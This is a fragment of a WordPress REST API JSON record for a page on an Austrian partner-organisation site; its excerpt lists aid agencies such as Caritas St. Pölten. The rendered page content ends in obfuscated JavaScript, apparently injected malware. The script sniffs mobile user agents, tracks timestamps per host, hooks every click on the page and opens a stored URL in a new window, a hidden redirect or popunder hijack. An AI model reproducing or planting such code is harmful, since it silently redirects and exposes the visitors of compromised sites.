|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Volkshilfe Solidarit\u00e4t &nbsp; \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Agjencia Austriake p\u00ebr Zhvillim &nbsp; \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Caritas St. P\u00f6lten &nbsp; \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Kultur Kontakt AUSTRIA &nbsp; \u00a0 \u00a0 \u00a0 \u00a0<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/270"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=270"}],"version-history":[{"count":145,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/270\/revisions"}],"predecessor-version":[{"id":4281,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/270\/revisions\/4281"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=270"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}